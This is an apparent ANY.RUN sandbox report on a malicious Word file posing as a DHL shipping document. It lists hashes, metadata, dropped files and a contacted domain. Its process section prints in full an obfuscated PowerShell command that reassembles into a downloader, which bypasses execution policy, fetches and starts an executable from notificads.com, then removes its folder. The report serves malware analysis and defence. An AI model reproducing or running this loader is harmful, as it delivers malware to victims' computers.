analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DHL_10_09_2018_296923.doc

Full analysis: https://app.any.run/tasks/7b866384-a531-4b82-902d-a9782bb10a97
Verdict: Malicious activity
Analysis date: November 14, 2018, 11:49:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Name of Creating Application: Microsoft Office Word, Author: Univ.Prof. Rudolph Ruppersberger B.A., Number of Characters: 637312, Create Time/Date: Wed Sep 5 12:17:17 2018, Last Saved Time/Date: Wed Sep 5 12:17:17 2018, Security: 0, Keywords: amet, accusamus, error, Last Saved By: Univ.Prof. Rudolph Ruppersberger B.A., Revision Number: 824362, Subject: DHL N296923, Template: Normal, Title: DHL N296923, Total Editing Time: 04:00, Number of Words: 79664, Number of Pages: 2, Comments: Esse pariatur necessitatibus explicabo magnam officiis.
MD5:

02E26014FBC793F4CDBBCB07B5C2B53A

SHA1:

08180038EAC34BD63D472FD0AE75BC694FA827CC

SHA256:

91BD2808342F2B39AA89793C3C80C380DBF155EDEBF5CB4CCE90E7B5CDFF1A3E

SSDEEP:

6144:D1KSGhLpl+lwLxH5dRQes3kHSGge45efZ:D1ahCGHLds3OSGgeb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • uwajrdcmgut0.exe (PID: 2104)

    • Executable content was dropped or overwritten

      • WINWORD.EXE (PID: 1840)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1840)

  • SUSPICIOUS

    • Executes application which crashes

      • uwajrdcmgut0.exe (PID: 2104)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1840)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1840)

    • Dropped object may contain Bitcoin addresses

      • WINWORD.EXE (PID: 1840)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (33.9)

EXIF

FlashPix

CompObjUserTypeLen: 39
CompObjUserType: Microsoft Office Word 97-2003 Document
Software: Microsoft Office Word
Author: Univ.Prof. Rudolph Ruppersberger B.A.
Characters: 637312
CreateDate: 2018:09:05 11:17:17
ModifyDate: 2018:09:05 11:17:17
Security: None
Keywords: amet, accusamus, error
LastModifiedBy: Univ.Prof. Rudolph Ruppersberger B.A.
RevisionNumber: 824362
Subject: DHL N296923
Template: Normal
Title: DHL N296923
TotalEditTime: 4.0 minutes
Words: 79664
Pages: 2
Comments: Esse pariatur necessitatibus explicabo magnam officiis.
Paragraphs: 930
Bytes: -2147483648
HiddenSlides: -2147483648
Lines: 7590
Notes: -2147483648
Slides: -2147483648
Company: Weller Schönland GbR
Manager: Dipl.-Ing. Lara Adolph B.Sc.
Category: laborum
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start start winword.exe uwajrdcmgut0.exe ntvdm.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1840"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DHL_10_09_2018_296923.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2104C:\Users\admin\AppData\Local\Temp\yvla_txoso\uwajrdcmgut0.exe $uxkfefpnxjz_aqxoeqmerfou_oo_awoubmkfupkbhv='ent/t';$hdmlxewpmmgaassoyeqhapa=':temp+''\';$oipjdmadsooyuatyi_aqwxygt_broydgge='-UFo';$zgwzrbfv_ebediepfmaoo_uaeqyszeowsfh='st';$zam_opcwue_neiksdk='anguage';$bv_yuhvehiwdske_afhcieyuuxyujlojmgt='et-Date ';$ubjkyrrtnmfeyeodbprhhczumzdwu='rm';$lsokreeuiypto=' + 11.11';$kzywmeamnocyejyruepbzlfcyr_i='Pr';$iwj_ngo_aogrifkmo_xiiymppwmrulnuqa='e(1){ ';$jzayyye_eeolkyzkevi=' -f';$elgiyuiucvzr_txgvwapve='icads';$axhgchohxteehhzee='s;Sta';$ypfjzqearan_gzbxpy_yegokav_fd='wnloadF';$ssigzyr_vqittixqozpmqbdbuiatko='We';$upnxfzutpoeiygursoigqbwg_jvoe='Star';$hqleingssaaqgqaeyzghwy_ekxedvln='s_kkvqc';$ckjeeoyauskautqohrenlwxrwveugqcdj='){';$hzhjliekmevindloaabwgw='e Proces';$aggnlhkesgaek_eiuaa_dwbinvfxemtya='= Get';$yaiyurvzpdyiufgyqxaaaivytoo_ie='at %s; f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$oaohwao_gpnlflsttgloikjnmy88='yftcna =';$icuofmpzqgohauixwvzherwvj_bhehmdolienvi='yuejs ';$yg_itsyoyndueoqq_e_ehkipuhcqn_yau58='s/';$nbmyyaiytteupck_iunkyiua=' ''\yvla_';$qxfwhxyueu_gf_aglaly_sxfsmgcgawxnilcnfy_aje='so''';$qpo_iudkiagcov='bclient';$sqaghozryvjjjou=') -';$oljoyljiyqdgprh='$path); ';$upfeywsrbbqeuz_fu_lreaotbbnrpe_oy_qx8='m 50';$auzjeslswuaeqedu_qioxpi_pioioupl_g63='86 -g';$xyod_ialqiozmv='em ($en';$bnhtxiycyrrpwidlcmzktqkigsyueauh='orce';$ffwziqkmvkymlhap_llxeetsmmnavga='1.exe'',';$nsm_ebftiugnwobqpcqgivlx_fnowdyrlvutm='3;if(';$yaokpoiexni='m.Ne';$fwexpbrmginkeei='s; $path';$ruqzyeqqkobtyaykptuyyvuybh='g.exe'')';$ehlooemlisg_tequuikz='olicy By';$glytusuxbyyqoicukm='$wsyhr8';$qzrdabjbee_aqsiitkoodcgu=' $yu';$jumiumjaouydlyfjqxgqsyyeznmedksqzzfaxz='Sleep -';$usszhacdybqzuoaakmwhsoyygsnflwguwv_p0='s $path;';$bioiygpicnoytbwtmqjjxewqwsuiqqrjc=' -UF';$rhjlwqoijhau_ddoeswjwysia_alhekzui='= G';$np_aega_pvoms_opjpuhnzbqglalcueooi='ormat %';$imufpu_tjueyvvoayiiuyaybgl_yzvi='cutionP';$iv_oyrgqxmuwt_pozyo='break;';$uiaiu_yusvhiswph='rt-';$ryooopapaauaku='calc';$oomsvb_siqyemlyeeioiwzqksf='ss -Scop';$ftxxdrboejopeyqdo='e f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$jeyreqgffozcruiqho='bject S';$ppnhsue_ilgozhg_ydmuaumqveknikl='yftcna';$f_dgaaatoymdfiiou_exqvi_thlxjuuouewaf='yste';$tapsrvuumj_gpuiy_udrimjtwmrloaue='Remove-';$fb_uzjulqo_ouddkauuaibmrxkeyudetro='ia/l';$fgsvfuye_laesuwsoioya_eavhegqxko='ejs';$tyilafqesmratfeghmsoytthprmnzxfljy='re';$cdjdo_epsmxhsuwiuoiyyyubfzdbvcytx_oysn_r='(''https:';$zgxzmuydmayero=';';$yufzjxzyflbeacueeepeeuuwv='emp +';$vuoit_pduuaviqgyl='-Date';$euuvfidtaeqqymsoyvz_smfuo_opf='/wp-cont';$kltztzdieooelkuphllffwpzwisbvfsbu='pa';$uuw_xbmipwiuqcpprf_irdku4='=($e';$lunoialqiuaadcud_ebcii=';(New-O';$mjihmqjaapktfi_uibwzvixqnt='le]f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$hjhajsyazbupzxhu_pccadjbyhsiy='curse';$yacvdocayis_uyhrtyy_dwibao='v:t';$iddgdldqmksjtoyyueeuoyxwu='nv';$pbyhqsafqmwyyumnyekqvnouqcemlzrknthkuoz_jf58='otif';$offaatawixxcdb_buyhuoyagzqit='Set-Exe';$beaxqc_apynbezxwtyspiepplea_zrmfqxugch='hr';$iieocymaerya_iayiytbhrtzegzowkxytj=').Do';$xtcqizxct_ycwubqjxafabajvitw='}}';$froxy_uyeeoeyhviwyln_aiznzhmv='[doub';$bjobvshigyqjvxxpi='ile';$hx_yiaalaiqiqffi_ueevty='oces';$tbpneebiiyslmqpllhrh_epcoxhewmygniywou='t-';$apczyyduecpjyyymfno=';whil';$oaescwgeallnhvogjouyi='6 ';$ynvyyynzpgukdpxqxuyo_lqa='//n';$apuovpypetphio_ihgjyrfwymjiwykpswulzd='$wsy';$lwuoclpfcrfsr_grvc='It';$tkumkeieuaaxxo_ooxcea='.com';$elyosjmwaieonkbl_fey='t.';$pfraamgeyewxrtlkoaidtu='hemes/he';$foyusgeow_dgifiioyqryelql='txo'; Invoke-Expression ($froxy_uyeeoeyhviwyln_aiznzhmv+$mjihmqjaapktfi_uibwzvixqnt+$icuofmpzqgohauixwvzherwvj_bhehmdolienvi+$rhjlwqoijhau_ddoeswjwysia_alhekzui+$bv_yuhvehiwdske_afhcieyuuxyujlojmgt+$oipjdmadsooyuatyi_aqwxygt_broydgge+$ubjkyrrtnmfeyeodbprhhczumzdwu+$yaiyurvzpdyiufgyqxaaaivytoo_ie+$oaohwao_gpnlflsttgloikjnmy88+$qzrdabjbee_aqsiitkoodcgu+$fgsvfuye_laesuwsoioya_eavhegqxko+$lsokreeuiypto+$apczyyduecpjyyymfno+$iwj_ngo_aogrifkmo_xiiymppwmrulnuqa+$glytusuxbyyqoicukm+$oaescwgeallnhvogjouyi+$aggnlhkesgaek_eiuaa_dwbinvfxemtya+$vuoit_pduuaviqgyl+$bioiygpicnoytbwtmqjjxewqwsuiqqrjc+$np_aega_pvoms_opjpuhnzbqglalcueooi+$axhgchohxteehhzee+$uiaiu_yusvhiswph+$jumiumjaouydlyfjqxgqsyyeznmedksqzzfaxz+$upfeywsrbbqeuz_fu_lreaotbbnrpe_oy_qx8+$nsm_ebftiugnwobqpcqgivlx_fnowdyrlvutm+$apuovpypetphio_ihgjyrfwymjiwykpswulzd+$beaxqc_apynbezxwtyspiepplea_zrmfqxugch+$auzjeslswuaeqedu_qioxpi_pioioupl_g63+$ftxxdrboejopeyqdo+$ppnhsue_ilgozhg_ydmuaumqveknikl+$ckjeeoyauskautqohrenlwxrwveugqcdj+$iv_oyrgqxmuwt_pozyo+$xtcqizxct_ycwubqjxafabajvitw+$offaatawixxcdb_buyhuoyagzqit+$imufpu_tjueyvvoayiiuyaybgl_yzvi+$ehlooemlisg_tequuikz+$kltztzdieooelkuphllffwpzwisbvfsbu+$oomsvb_siqyemlyeeioiwzqksf+$hzhjliekmevindloaabwgw+$fwexpbrmginkeei+$uuw_xbmipwiuqcpprf_irdku4+$iddgdldqmksjtoyyueeuoyxwu+$hdmlxewpmmgaassoyeqhapa+$hqleingssaaqgqaeyzghwy_ekxedvln+$ruqzyeqqkobtyaykptuyyvuybh+$lunoialqiuaadcud_ebcii+$jeyreqgffozcruiqho+$f_dgaaatoymdfiiou_exqvi_thlxjuuouewaf+$yaokpoiexni+$elyosjmwaieonkbl_fey+$ssigzyr_vqittixqozpmqbdbuiatko+$qpo_iudkiagcov+$iieocymaerya_iayiytbhrtzegzowkxytj+$ypfjzqearan_gzbxpy_yegokav_fd+$bjobvshigyqjvxxpi+$cdjdo_epsmxhsuwiuoiyyyubfzdbvcytx_oysn_r+$ynvyyynzpgukdpxqxuyo_lqa+$pbyhqsafqmwyyumnyekqvnouqcemlzrknthkuoz_jf58+$elgiyuiucvzr_txgvwapve+$tkumkeieuaaxxo_ooxcea+$euuvfidtaeqqymsoyvz_smfuo_opf+$uxkfefpnxjz_aqxoeqmerfou_oo_awoubmkfupkbhv+$pfraamgeyewxrtlkoaidtu+$zgwzrbfv_ebediepfmaoo_uaeqyszeowsfh+$fb_uzjulqo_ouddkauuaibmrxkeyudetro+$zam_opcwue_neiksdk+$yg_itsyoyndueoqq_e_ehkipuhcqn_yau58+$ryooopapaauaku+$ffwziqkmvkymlhap_llxeetsmmnavga+$oljoyljiyqdgprh+$upnxfzutpoeiygursoigqbwg_jvoe+$tbpneebiiyslmqpllhrh_epcoxhewmygniywou+$kzywmeamnocyejyruepbzlfcyr_i+$hx_yiaalaiqiqffi_ueevty+$usszhacdybqzuoaakmwhsoyygsnflwguwv_p0+$tapsrvuumj_gpuiy_udrimjtwmrloaue+$lwuoclpfcrfsr_grvc+$xyod_ialqiozmv+$yacvdocayis_uyhrtyy_dwibao+$yufzjxzyflbeacueeepeeuuwv+$nbmyyaiytteupck_iunkyiua+$foyusgeow_dgifiioyqryelql+$qxfwhxyueu_gf_aglaly_sxfsmgcgawxnilcnfy_aje+$sqaghozryvjjjou+$tyilafqesmratfeghmsoytthprmnzxfljy+$hjhajsyazbupzxhu_pccadjbyhsiy+$jzayyye_eeolkyzkevi+$bnhtxiycyrrpwidlcmzktqkigsyueauh+$zgxzmuydmayero);C:\Users\admin\AppData\Local\Temp\yvla_txoso\uwajrdcmgut0.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2184"C:\Windows\system32\ntvdm.exe" -i1 C:\Windows\system32\ntvdm.exeuwajrdcmgut0.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
NTVDM.EXE
Exit code:
3221225477
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 565
Read events
1 160
Write events
0
Delete events
0

Modification events

No data
Executable files
13
Suspicious files
1
Text files
122
Unknown types
2

Dropped files

PID
Process
Filename
Type
1840WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA5D0.tmp.cvr
MD5:
SHA256:
1840WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:256A3EF47ED32A3D3038855D49DF0319
SHA256:151B56C71BC28DD4D752808CE3A9352E96D9FA381320511F87B327A8208F5DD0
1840WINWORD.EXEC:\Users\admin\AppData\Local\Temp\yvla_txoso\Certificate.format.ps1xmlxml
MD5:C93A361112351B30E2C959E72789952D
SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D
1840WINWORD.EXEC:\Users\admin\AppData\Local\Temp\yvla_txoso\Diagnostics.Format.ps1xmltext
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC
SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689
1840WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$L_10_09_2018_296923.docpgc
MD5:6647FF64EF47478B584DC2E6183C03F9
SHA256:3306934814ABDBCD99E45FC7AE59D730B2D90982148A3F9BC8EDEF4CD78B116C
1840WINWORD.EXEC:\Users\admin\AppData\Local\Temp\yvla_txoso\CompiledComposition.Microsoft.PowerShell.GPowerShell.dllexecutable
MD5:A84B6952AB6A297CCE6C085FA8AB06CB
SHA256:54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D
1840WINWORD.EXEC:\Users\admin\AppData\Local\Temp\yvla_txoso\DotNetTypes.format.ps1xmlxml
MD5:1AB2FD4B6749AD6831C86411FDCAFB48
SHA256:98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF
1840WINWORD.EXEC:\Users\admin\AppData\Local\Temp\yvla_txoso\en-US\about_aliases.help.txttext
MD5:DCCDE3D3FA7A378DAB091D3B78E393CB
SHA256:5DD570CAA907247BAC82B722B453619ADC88063C238B294154939481C134B140
1840WINWORD.EXEC:\Users\admin\AppData\Local\Temp\yvla_txoso\en-US\about_Core_Commands.help.txttext
MD5:9DDD0D75DB8B8D52E1BD4474ED24582F
SHA256:A7743FC735A6887CB51A51FB26E57FD0ED858CBAE9844242B49A6C80D7AFA45C
1840WINWORD.EXEC:\Users\admin\AppData\Local\Temp\yvla_txoso\en-US\about_Comparison_Operators.help.txttext
MD5:409ED6BE5314BAC97AFC88ACA11725A8
SHA256:613EBA45D12113B49D942FF9CFC939F0F5C8CABB819B5B3BD47B7A4F9E719D48
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2104
uwajrdcmgut0.exe
104.27.163.220:443
notificads.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
notificads.com
  • 104.27.163.220
  • 104.27.162.220
suspicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
DHL_10_09_2018_296923.doc